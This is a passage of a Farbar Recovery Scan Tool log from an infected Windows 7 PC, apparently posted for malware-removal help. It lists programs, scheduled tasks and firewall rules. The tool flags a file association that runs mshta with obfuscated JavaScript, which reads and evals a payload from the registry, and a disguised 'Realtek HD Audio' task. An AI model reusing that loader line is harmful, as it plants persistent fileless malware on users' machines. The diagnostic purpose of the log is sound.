2017-04-04 16:22 - 2015-09-13 10:02 - 00000000 ____D C:\Program Files\PowerISO
2017-04-03 20:08 - 2009-07-14 06:20 - 00000000 ____D C:\Windows\system32\NDF
2017-03-28 11:07 - 2015-09-16 19:47 - 00000000 ____D C:\Windows\SysWOW64\directx
2017-03-25 17:32 - 2015-09-13 08:44 - 00000000 ____D C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games
2017-03-25 13:57 - 2015-09-13 10:02 - 00000812 _____ C:\Users\Public\Desktop\PowerISO.lnk
 
==================== Files in the root of some directories =======
 
2015-10-24 13:43 - 2016-10-07 20:59 - 0007605 _____ () C:\Users\HP\AppData\Local\Resmon.ResmonCfg
2015-11-19 19:41 - 2015-11-19 19:41 - 0000003 _____ () C:\Users\HP\AppData\Local\updater.log
2015-11-19 19:41 - 2015-11-19 19:42 - 0000059 _____ () C:\Users\HP\AppData\Local\UserProducts.xml
 
Some files in TEMP:
====================
2006-10-17 08:20 - 2006-10-17 08:20 - 0569344 _____ (Electronic Arts Inc.) C:\Users\HP\AppData\Local\Temp\AutoRun.exe
2015-09-19 15:15 - 2006-10-13 11:01 - 0528384 _____ (Electronic Arts Inc.) C:\Users\HP\AppData\Local\Temp\AutoRunGUI.dll
2013-08-05 09:15 - 2013-08-05 09:15 - 4292136 _____ (www.Bandisoft.com) C:\Users\HP\AppData\Local\Temp\bdfilters.dll
2016-09-06 17:13 - 2016-09-06 17:13 - 7850088 _____ (Microsoft Corporation) C:\Users\HP\AppData\Local\Temp\BingBarSetup-Partner.exe
2017-03-13 16:49 - 2004-09-20 12:27 - 0040960 _____ () C:\Users\HP\AppData\Local\Temp\comver.dll
2011-03-30 11:40 - 2011-03-30 11:40 - 0095576 _____ (Microsoft Corporation) C:\Users\HP\AppData\Local\Temp\DSETUP.dll
2011-03-30 11:40 - 2011-03-30 11:40 - 1566040 _____ (Microsoft Corporation) C:\Users\HP\AppData\Local\Temp\dsetup32.dll
2011-03-30 11:40 - 2011-03-30 11:40 - 0517976 _____ (Microsoft Corporation) C:\Users\HP\AppData\Local\Temp\DXSETUP.exe
2015-09-19 15:15 - 2006-10-13 11:01 - 0720896 _____ () C:\Users\HP\AppData\Local\Temp\EAInstall.dll
2015-09-19 15:43 - 2006-10-17 08:20 - 0253952 _____ (Electronic Arts Inc.) C:\Users\HP\AppData\Local\Temp\eauninstall.exe
2017-03-13 17:08 - 1999-06-25 10:55 - 0149504 _____ () C:\Users\HP\AppData\Local\Temp\GLB1A2B.EXE
2015-09-27 17:31 - 2015-09-29 20:55 - 0035680 _____ () C:\Users\HP\AppData\Local\Temp\i4jdel1.exe
2015-09-19 15:43 - 2006-09-23 09:10 - 0073728 _____ (Electronic Arts Inc.) C:\Users\HP\AppData\Local\Temp\Need for Speed Carbon_uninst.exe
2012-10-01 15:22 - 2012-10-01 15:22 - 0150648 ____R (Microsoft Corporation) C:\Users\HP\AppData\Local\Temp\ose00002.exe
2017-04-20 10:04 - 2017-04-20 10:04 - 0049152 _____ (Alienware) C:\Users\HP\AppData\Local\Temp\sansevierias.dll
2016-02-21 19:25 - 2016-02-21 19:28 - 47347840 _____ (Skype Technologies S.A.) C:\Users\HP\AppData\Local\Temp\SkypeSetup.exe
2016-07-01 19:58 - 2016-07-01 19:59 - 0696832 ____N () C:\Users\HP\AppData\Local\Temp\sqlite-3.8.10.1-19805034-23e3-480e-803b-cbdc2f7d3ffb-sqlitejdbc.dll
2015-10-31 17:46 - 2016-12-28 18:46 - 0116777 _____ () C:\Users\HP\AppData\Local\Temp\Uninstall.exe
2015-12-04 17:41 - 2015-12-04 17:42 - 4216840 _____ (Microsoft Corporation) C:\Users\HP\AppData\Local\Temp\vcredist9_x86.exe
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2017-04-22 12:00
 
==================== End of FRST.txt ============================

Addition log:
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 22-04-2017
Ran by HP (22-04-2017 16:57:09)
Running from C:\Users\HP\Desktop
Windows 7 Professional (X64) (2015-09-12 04:16:35)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1988295413-3700943990-1798627009-500 - Administrator - Disabled)
Guest (S-1-5-21-1988295413-3700943990-1798627009-501 - Limited - Disabled)
HP (S-1-5-21-1988295413-3700943990-1798627009-1000 - Administrator - Enabled) => C:\Users\HP
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Microsoft Security Essentials (Enabled - Up to date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
AS: Microsoft Security Essentials (Enabled - Up to date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
"FIFA 14" (HKLM-x32\...\{6049054B-DB11-48E1-A583-9A565D5C8856}_is1) (Version: 1.3.0.0 - )
µTorrent (HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\uTorrent) (Version: 3.4.9.43388 - BitTorrent Inc.)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Adobe Flash Player 25 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 25.0.0.148 - Adobe Systems Incorporated)
AutoHotkey 1.1.22.09 (HKLM\...\AutoHotkey) (Version: 1.1.22.09 - Lexikos)
CLEO 4.3 (HKLM-x32\...\{A8F37EB0-C741-41D7-8CAB-5B40ECEEF094}_is1) (Version: 4.3 - Seemann, Deji, Alien)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Fraps (remove only) (HKLM-x32\...\Fraps) (Version:  - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)
Google Update Helper (x32 Version: 1.3.33.3 - Google Inc.) Hidden
GTA:SA Crash Fix-v2.4 (HKLM-x32\...\GTA:SA Crash Fix-v2.4) (Version: v2.4 - Whitetiger)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3431 - Intel Corporation)
Java 8 Update 111 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180111F0}) (Version: 8.0.1110.14 - Oracle Corporation)
League of Legends (HKLM-x32\...\League of Legends 4.2.1) (Version: 4.2.1 - Riot Games)
League of Legends (x32 Version: 4.2.1 - Riot Games) Hidden
Lightshot-5.3.0.0 (HKLM-x32\...\{30A5B3C9-2084-4063-A32A-628A98DE512B}_is1) (Version: 5.3.0.0 - Skillbrains)
Metric Collection SDK 35 (x32 Version: 1.2.0010.00 - Lenovo Group Limited) Hidden
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{59E4543A-D49D-4489-B445-473D763C79AF}) (Version: 2.0.672.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM-x32\...\Office15.PROPLUS) (Version: 15.0.4420.1017 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.8.204.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x64 8.0.61000 (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{1a63c099-febd-4eaf-83ad-a82ea4fdac49}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{b55f7208-e02b-4828-ac78-59c73ddf5bc7}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
NVIDIA PhysX (HKLM-x32\...\{3F5C371F-8EA2-4F25-9D3D-D0B4526E3AEA}) (Version: 9.10.0513 - NVIDIA Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 18.0.1 - OBS Project)
Outils de vérification linguistique 2013 de Microsoft Office - Français (x32 Version: 15.0.4420.1017 - Microsoft Corporation) Hidden
ParentalControl(x86) (HKU\.DEFAULT\...\ParentalControl) (Version:  - )
PowerISO (HKLM-x32\...\PowerISO) (Version: 6.8 - Power Software Ltd)
Project Zomboid (HKLM\...\Steam App 108600) (Version:  - The Indie Stone)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
Skype™ 7.10 (HKLM-x32\...\{6A0549A9-1B96-498C-ACBC-3943001FEB19}) (Version: 7.10.101 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-1988295413-3700943990-1798627009-1000_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {09F5CBAD-E307-4F17-A703-07B1F2BF3CE9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-07] (Google Inc.)
Task: {22F66836-DF7B-4793-9F04-FC8E255DD02E} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => %ProgramFiles%\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe 
Task: {2ADBDC4B-09A5-4957-8021-596523253262} - System32\Tasks\{B057C60C-3FC4-43D4-86B4-ADB5B47005C4} => pcalua.exe -a "C:\Program Files (x86)\Electronic Arts\Need for Speed Carbon\nfs_uninst.exe" -d "C:\Program Files (x86)\Electronic Arts\Need for Speed Carbon"
Task: {2E6AD43C-9B7E-4B4D-B127-8DDA400429C4} - System32\Tasks\Realtek HD Audio => C:\Users\HP\AppData\Roaming\SecuROM\Realtek HD\rthdcpl.exe [2016-06-12] () <==== ATTENTION
Task: {3325DDD7-BD30-4A5F-8A4F-9241EBE43365} - System32\Tasks\RegIdleBackup => C:\windows\icm32.exe [2017-04-22] ()
Task: {44507965-AB32-45A0-9037-627912BE4D51} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation)
Task: {6FC221A6-B17C-4DBB-9BDF-F541A7FEB435} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-07] (Google Inc.)
Task: {9E71D6F2-9FDF-4F84-A08A-4BF032E1A962} - System32\Tasks\{9DC3C148-A635-469D-B6C5-7B48EC8BEC4C} => pcalua.exe -a "C:\Program Files (x86)\TeamSpeak 3 Client\package_inst.exe" -d C:\Users\HP\Desktop -c "C:\Users\HP\Desktop\ts3_overlay-v3.8.23.ts3_plugin"
Task: {B357887E-D687-41F0-BC9B-69046826C8B9} - System32\Tasks\{390B4BC4-913C-42CB-8F5F-90341B4FC536} => pcalua.exe -a C:\Users\HP\Desktop\dotnetfx35.exe -d C:\Users\HP\Desktop
Task: {CA1AB6CF-FE62-42FB-9E4B-6BEA8C94A853} - System32\Tasks\update-S-1-5-21-1988295413-3700943990-1798627009-1000 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe 
Task: {D8CB8877-7922-4C86-B334-D3C83957C2C5} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-04-12] (Adobe Systems Incorporated)
Task: {DC6DE3CF-AD1E-4080-A50D-071E517F7760} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-03] (Adobe Systems Incorporated)
Task: {E4C01461-EB1E-4E90-B5C9-0249077C2782} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe 
Task: {EDAC11F3-0ABA-47D3-93B3-5907AD49E321} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_25_0_0_148_pepper.exe [2017-04-12] (Adobe Systems Incorporated)
Task: {F4938FDB-88AC-456F-AF11-0A6896012023} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation)
Task: {F7AF3418-358E-4609-9103-5FFAF7774AB2} - System32\Tasks\{86222619-D61C-4F8D-A492-9008F70161F8} => pcalua.exe -a "C:\Users\HP\Downloads\[PC] Medal of Honor Airborne [RIP] [dopeman]\MOHA\Medal of Honor Airborne\UnrealEngine3\Binaries\moha_setup.exe" -d "C:\Users\HP\Downloads\[PC] Medal of Honor Airborne [RIP] [dopeman]\MOHA\Medal of Honor Airborne\UnrealEngine3\Binaries" -c dxlevel 91
Task: {FCAC6AD3-34A7-4EF5-9186-B83F0C45FD1E} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => %ProgramFiles(x86)%\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe 
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\update-S-1-5-21-1988295413-3700943990-1798627009-1000.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
Task: C:\Windows\Tasks\update-sys.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
==================== Loaded Modules (Whitelisted) ==============
 
2012-10-01 20:34 - 2012-10-01 20:34 - 06522480 _____ () C:\Program Files\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2015-11-14 20:07 - 2015-11-11 14:04 - 01143808 _____ () C:\Program Files\AutoHotkey\AutoHotkey.exe
2017-04-07 20:02 - 2017-03-29 11:47 - 02885464 _____ () C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\libglesv2.dll
2017-04-07 20:02 - 2017-03-29 11:47 - 00099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\libegl.dll
2012-10-01 20:33 - 2012-10-01 20:33 - 06522480 _____ () C:\Program Files (x86)\Microsoft Office\Office15\1033\GrooveIntlResource.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\ProgramData:NT2 [344]
AlternateDataStreams: C:\Users\All Users:NT [40]
AlternateDataStreams: C:\Users\All Users:NT2 [344]
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT2 [344]
AlternateDataStreams: C:\Users\HP\Application Data:NT [40]
AlternateDataStreams: C:\Users\HP\Application Data:NT2 [344]
AlternateDataStreams: C:\Users\HP\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\HP\AppData\Roaming:NT2 [344]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
HKU\.DEFAULT\Software\Classes\23352ea4: "C:\Windows\system32\mshta.exe" "javascript:fX5Ma="nNrr";JA1=new ActiveXObject("WScript.Shell");CSc4J="v9eFQB";o3BHJ5=JA1.RegRead("HKCU\\software\\uafzn\\pasf");Gb9xLXb="36Ad";eval(o3BHJ5);lnG1a="d";" <===== ATTENTION
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-14 05:34 - 2017-04-21 08:55 - 00007289 ____A C:\Windows\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\HP\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [TCP Query User{7B1118C8-6331-4F74-8930-1167DA5E3E26}C:\users\hp\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\hp\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [UDP Query User{2CC20DD6-01D5-4490-89A6-147032A36F9D}C:\users\hp\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\hp\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [TCP Query User{EE098C1C-5469-4A60-ACCA-42A705D3434A}C:\program files (x86)\fifa 14\game\fifa14.exe] => (Allow) C:\program files (x86)\fifa 14\game\fifa14.exe
FirewallRules: [UDP Query User{F9D27D5B-4A48-4C94-83FE-494AE9427821}C:\program files (x86)\fifa 14\game\fifa14.exe] => (Allow) C:\program files (x86)\fifa 14\game\fifa14.exe
FirewallRules: [TCP Query User{18CB8871-1737-4200-8959-A06B9C8458E7}C:\users\hp\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\hp\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [UDP Query User{FE39E1A7-3BCE-47B8-ADDE-41D1A07E2006}C:\users\hp\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\hp\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [TCP Query User{639E2C2B-16A6-4DDC-BA2F-D0118B46FD94}C:\program files (x86)\mta san andreas 1.5\server\mta server.exe] => (Allow) C:\program files (x86)\mta san andreas 1.5\server\mta server.exe
FirewallRules: [UDP Query User{B94F2984-11FB-4AD7-887A-50732770D7CA}C:\program files (x86)\mta san andreas 1.5\server\mta server.exe] => (Allow) C:\program files (x86)\mta san andreas 1.5\server\mta server.exe
FirewallRules: [TCP Query User{BA364FC7-24DC-4A1A-A664-50B3D4A8787D}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{62099E17-A9FD-4F61-978E-900F47541AD0}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{A3C7731C-C901-4AED-8606-788E21702FC6}C:\users\hp\downloads\project_zomboid_build_33.5\project_zomboid_build_33.5\project_zomboid_build_33.5\projectzomboid64.exe] => (Allow) C:\users\hp\downloads\project_zomboid_build_33.5\project_zomboid_build_33.5\project_zomboid_build_33.5\projectzomboid64.exe
FirewallRules: [UDP Query User{0DBE3ACB-D74C-4760-AD7C-63874D80219F}C:\users\hp\downloads\project_zomboid_build_33.5\project_zomboid_build_33.5\project_zomboid_build_33.5\projectzomboid64.exe] => (Allow) C:\users\hp\downloads\project_zomboid_build_33.5\project_zomboid_build_33.5\project_zomboid_build_33.5\projectzomboid64.exe
FirewallRules: [TCP Query User{1B48C685-D696-4B92-B371-FF1F999C1240}C:\users\hp\desktop\samp037_svr_r2-1-1_win32\samp-server.exe] => (Allow) C:\users\hp\desktop\samp037_svr_r2-1-1_win32\samp-server.exe
FirewallRules: [UDP Query User{E0FC5156-76FB-4CE7-B1A7-C717BA03DC61}C:\users\hp\desktop\samp037_svr_r2-1-1_win32\samp-server.exe] => (Allow) C:\users\hp\desktop\samp037_svr_r2-1-1_win32\samp-server.exe
FirewallRules: [TCP Query User{EE118442-1EF2-4B6F-A3A3-5BF7DF60D798}C:\users\hp\desktop\texture studio\samp-server.exe] => (Allow) C:\users\hp\desktop\texture studio\samp-server.exe
FirewallRules: [UDP Query User{E9C3F6D7-8819-4D97-8404-70B0BACD5DAD}C:\users\hp\desktop\texture studio\samp-server.exe] => (Allow) C:\users\hp\desktop\texture studio\samp-server.exe
FirewallRules: [TCP Query User{312991FA-EB93-4EF3-9439-F83B1B183571}C:\users\hp\downloads\project.zomboid.build.32.30\project.zomboid.build.32.30\projectzomboid64.exe] => (Allow) C:\users\hp\downloads\project.zomboid.build.32.30\project.zomboid.build.32.30\projectzomboid64.exe
FirewallRules: [UDP Query User{15EF6B01-90B6-431F-9F8B-EDEFAAADFAA9}C:\users\hp\downloads\project.zomboid.build.32.30\project.zomboid.build.32.30\projectzomboid64.exe] => (Allow) C:\users\hp\downloads\project.zomboid.build.32.30\project.zomboid.build.32.30\projectzomboid64.exe
FirewallRules: [{97CF9C87-D4EC-40EB-9A08-BCF03A686954}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{64B9E22B-95AD-4020-AE0D-D9BFAB7323DC}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{E84A0326-576C-4A54-9086-AAA0906B612D}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{E9835C84-696D-418C-8B99-ADE9F33CD05E}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [TCP Query User{441CC1D9-CABF-4C9B-8F92-B66276FA97FF}C:\program files (x86)\repack by s.l\spintires\launcher.exe] => (Allow) C:\program files (x86)\repack by s.l\spintires\launcher.exe
FirewallRules: [UDP Query User{AFB9A356-C652-4859-AC2D-F1E7B6A0F06B}C:\program files (x86)\repack by s.l\spintires\launcher.exe] => (Allow) C:\program files (x86)\repack by s.l\spintires\launcher.exe
FirewallRules: [TCP Query User{EC646AD1-5D56-41D2-926F-C12EA6261B6F}C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe] => (Allow) C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe
FirewallRules: [UDP Query User{17D0503A-5B06-4918-A320-CB58C49EC9F5}C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe] => (Allow) C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe
FirewallRules: [TCP Query User{3E3653FB-F2AB-4E49-981B-BC7652AC5D96}C:\program files (x86)\steam\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\projectzomboid\jre64\bin\java.exe
FirewallRules: [UDP Query User{2BCB61E3-55D6-4A18-BFAF-3259606EFB0D}C:\program files (x86)\steam\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\projectzomboid\jre64\bin\java.exe
FirewallRules: [TCP Query User{3822C677-6992-4900-AE6A-789C7B3D610A}C:\program files (x86)\steam\steamapps\common\war thunder\win64\aces.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\war thunder\win64\aces.exe
FirewallRules: [UDP Query User{729F518E-2172-4AF2-A625-5DDB66A1318C}C:\program files (x86)\steam\steamapps\common\war thunder\win64\aces.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\war thunder\win64\aces.exe
